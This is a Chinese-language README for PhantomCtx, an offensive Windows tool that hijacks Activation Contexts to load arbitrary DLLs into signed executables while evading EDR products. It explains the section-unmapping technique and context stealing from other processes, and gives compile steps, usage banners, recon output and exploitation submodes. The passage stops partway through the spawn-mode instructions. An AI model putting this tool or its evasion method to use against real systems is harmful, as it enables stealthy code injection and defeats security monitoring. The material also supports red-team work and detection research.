PhantomCtx 是一款自动化 激活上下文(Activation Context) 劫持的工具,其目标是在绝大多数已签名可执行文件(例如 Microsoft、Adobe、Mozilla)中加载任意 DLL。
该加载器被定位为传统 DLL 劫持与侧加载(DLL Hijacking & Sideloading) 的现代替代方案:与传统方法不同,它不需要存在易受攻击的二进制文件。只要目标可执行文件 通过其导入地址表(Import Address Table, IAT)解析 DLL,或者在最坏情况下通过 LoadLibrary 且不使用绝对路径来解析 DLL,即可执行该技术。```c
C:\PhantomCtx\x64>.\PhantomCtx.exe
+----------------------------------+
| PhantomCtx v1.0 |
+----------------------------------+
Usage: PhantomCtx.exe -m [MODE] [OPTIONS]
Modes: -m recon Displays information about the Activation Context DLL redirections of a running process or one to be spawned.
-m spawn Perform Activation Context Hijacking using an on-disk executable
(preferably a signed binary for OPSEC purposes).
-m runtime Perform Activation Context Hijacking on an already running process.
若要深入了解其内部工作原理以及如何规避激进的 EDR 解决方案,请查看[我的技术博客](https://rexmax.dev/posts/phantomctx-new-approach-to-activation-context-hijacking-for-edr-evasion/)上的文章。
# 目录
- [内部机制](#internal-mechanism)
- [一种专注于 EDR 规避的激活上下文劫持新方法](#a-new-method-for-activation-context-hijacking-focused-on-edr-evasion)
- [如何编译](#how-to-compile)
- [用法:基于模块的工作流](#usage-module-based-workflow)
- [侦察](#recon)
- [Spawn(推荐)](#spawn-recommended)
- [运行时](#runtime)
- [示例:激活上下文劫持 + DLL 代理 mpnotify.exe](#example-activation-context-hijacking--dll-proxying-mpnotifyexe)
- [免责声明](#disclaimer)
- [参考](#references)
# 内部机制
`PhantomCtx` 滥用大多数进程中都存在的 **合法** Windows 功能,即 **激活上下文(Activation Contexts)**。根据 Microsoft 的说法:
>[_激活上下文_](https://learn.microsoft.com/en-us/windows/win32/sbscs/a-sbscs-gly) 是内存中的数据结构,系统可利用其中信息将应用程序重定向 **为加载特定 DLL 版本**、COM 对象实例或自定义窗口版本...
当 Windows 加载程序解析 DLL(通过 `LoadLibrary` 或导入表)时,它会遵循已定义的解析顺序:
1. DLL 重定向
2. API 集
3. **SxS 清单重定向**
4. 已加载模块列表
5. 已知 DLL
6. 进程包依赖关系图
7 – 12. 磁盘上的标准文件搜索顺序
`PhantomCtx` 针对第 3 步:**SxS 清单重定向**。激活上下文源自与可执行文件关联的[并行程序集](https://en.wikipedia.org/wiki/Side-by-side_assembly)(`.manifest`)文件,通常嵌入在 PE 二进制文件中。在内部,激活上下文包含一个 **目录(Table of Contents,ToC)**,为多个节建立索引,包括 **DLL 重定向节**。加载程序通常通过 `PEB.ActivationContextData` 访问激活上下文。
[Kurosh Dabbagh Escalante](https://github.com/Kudaes) 的研究表明,可以使用 `CreateActCtxW` 构造恶意激活上下文,将其写入目标进程的 `RW` 内存,然后通过覆盖 `PEB.ActivationContextData` 使其指向构造的结构来激活。
一旦被劫持,加载程序会解析恶意激活上下文中定义的 DLL 重定向,**将库解析重定向**到攻击者控制的路径。
作为其研究的一部分而开发的名为 `Eclipse` 的加载程序可在其[官方仓库](https://github.com/Kudaes/Eclipse)中找到。
## 一种专注于 EDR 规避的激活上下文劫持新方法
经过多次测试,`Eclipse` 在以下位置被 Elastic 等激进 EDR 检测到:
- `Potential Suspended Process Code Injection`:挂起的进程创建,随后使用 `NtWriteVirtualMemory` 将 AC 数据块复制到远程进程。
- `Remote Process Memory Write by Low Reputation Module`:调用栈中没有 `CreateProcess` 的 `NtWriteVirtualMemory` 以及低信誉模块,用于覆盖 `PEB.ActivationContextData`。
- `Remote Memory Write to Trusted Target Process`:调用栈中没有 `CreateProcess` 的 `WriteProcessMemory`,仅限系统/用户安装的二进制文件。
经过一天的研究,寻找可在 `PhantomCtx` 中实现的替代方法,我发现 **原始激活上下文的内存区域是进程创建期间映射的一个节视图**。可以 **使用 `NtUnmapViewOfSection` 取消映射该节视图**,然后创建一个由恶意激活上下文支持的新只读节视图,并将其映射到原始节视图所在的 **完全相同的内存地址**。
因此,加载程序 **不再需要** 覆盖 `PEB.ActivationContextData` 指针。这消除了使用 `NtAllocateVirtualMemory` 和 `NtWriteVirtualMemory` 的必要性,从而绕过所有与远程进程内存写入和注入相关的 EDR 监控规则。
此外,为了提高检测难度,`PhantomCtx` 不使用 `CreateActCtxW`,因此在攻击过程中无需处理 `.manifest` 文件。根据所选模式,它可以使用 `NtReadVirtualMemory` **从另一个包含有效 DLL 重定向节的远程进程中窃取激活上下文**,在本地重建 DLL 重定向条目、对其进行修补,然后替换原始上下文。
# 如何编译
要编译该工具,建议使用 Visual Studio 或兼容的编译器。
如果使用 VS,请打开 `x64 Native Tools Command Prompt for VS`,导航到项目根目录,然后使用 `compile.bat` 进行编译:```
C:\PhantomCtx>.\compile.bat
[INFO] Created output directory: x64
[INFO] Compiling PhantomCtx...
main.c
utils.c
recon.c
actctx.c
c_runtime.c
dynamic_resolution.c
process_utils.c
spawn.c
runtime.c
Generating Code...
[SUCCESSFUL] Build successful: x64\PhantomCtx.exe
该工具采用模块化架构设计,在简化开发的同时,为操作者提供清晰、分步骤的工作流。
每个模块在利用工作流中都扮演着特定的角色。
请花一点时间了解每个模块的用途,以充分发挥该工具的全部能力!!!
攻击既可以针对待生成的进程(推荐)执行,也可以针对已运行的进程执行。该工具旨在同时处理这两种场景。```c C:\PhantomCtx\x64>.\PhantomCtx.exe
+----------------------------------+
| PhantomCtx v1.0 |
+----------------------------------+
Usage: PhantomCtx.exe -m [MODE] [OPTIONS]
Modes: -m recon Displays information about the Activation Context DLL redirections of a running process or one to be spawned.
-m spawn Perform Activation Context Hijacking using an on-disk executable
(preferably a signed binary for OPSEC purposes).
-m runtime Perform Activation Context Hijacking on an already running process.
## Recon
`recon` 模式专注于解析目标程序或运行中进程的激活上下文(Activation Context)。它是应首先执行的模块,因为它决定在利用工作流中应使用哪个利用子模块。```c
C:\PhantomCtx\x64>.\PhantomCtx.exe -m recon -h
+----------------------------------+
| PhantomCtx v1.0 |
+----------------------------------+
Usage:
PhantomCtx.exe -m recon -s [SUBMODE] -p [PROCESS_NAME|PATH]
Submodes:
-s spawn Spawn a process in suspended mode to retrieve its
Activation Context DLL redirection information.
-s runtime Attach to a currently running process to retrieve its
Activation Context DLL redirection information.
Examples:
PhantomCtx.exe -m recon -s spawn -p C:\path\to\target.exe
PhantomCtx.exe -m recon -s runtime -p target.exe
作为示例,我们使用已签名的 Microsoft 二进制文件 mpnotify.exe。第一步是确定它是否包含带有 DLL 重定向节的有效 Activation Context。
如果没有,该工具建议使用 spawn 或 runtime 模式下的 steal-context 子模块,该子模块从另一个包含有效重定向节的进程中检索 Activation Context。```c
C:\PhantomCtx\x64>.\PhantomCtx.exe -m recon -s spawn -p "C:\Windows\System32\mpnotify.exe"
[SUCCESS] Suspended process created...
[SUCCESS] Activation Context Data Blob copied to local heap buffer @00000294CEA79CD0 (916 bytes)
+-[ ACTIVATION CONTEXT DATA ] | Magic : 0x78746341 (Actx) | HeaderSize : 0x20 (32 bytes) | FormatVersion : 1 | TotalSize : 0x394 (916 bytes) | Flags : 0x00000000 | +--[ TOC ] 6 entries | [00] Id=1 Format=1 Offset=0x00D4 Length=0x0218 | [01] Id=4 Format=2 Offset=0x02EC Length=0x0028 | [02] Id=5 Format=2 Offset=0x0314 Length=0x0028 | [03] Id=6 Format=2 Offset=0x033C Length=0x0028 | [04] Id=9 Format=2 Offset=0x0364 Length=0x0028 | [05] Id=11 Format=1 Offset=0x038C Length=0x0008 | +--[ DLL REDIRECTION ] not present in this blob | +--[ HINT ] Use 'steal-context' to steal the Activation Context from a running process that has one. Example: -m spawn|runtime -s steal-context -p -d --dll-path --steal-from
如果目标程序或进程的 Activation Context 包含有效的 DLL 重定向节,最有效的方法是使用 `spawn` 或 `runtime` 利用模式中的 `add-entry` 或 `patch-entry` 子模块。
## Spawn(推荐)
`spawn` 模式旨在通过从目标系统上的签名可执行文件生成进程来执行 Activation Context 劫持。
由于操作简单且可靠性高,此方法是**最推荐**且经过全面测试的。```c
C:\PhantomCtx\x64>.\PhantomCtx.exe -m spawn -h
+----------------------------------+
| PhantomCtx v1.0 |
+----------------------------------+
Usage:
PhantomCtx.exe -m spawn -s [SUBMODE] -p [PATH] [OPTIONS]
Submodes:
-s steal-context Spawn a process and hijack its Activation Context
by stealing the context from another running process.
-s add-entry Spawn a process and hijack its Activation Context
by adding a new DLL redirection entry.
-s patch-entry Spawn a process and hijack its Activation Context
by patching the path of an existing DLL redirection entry.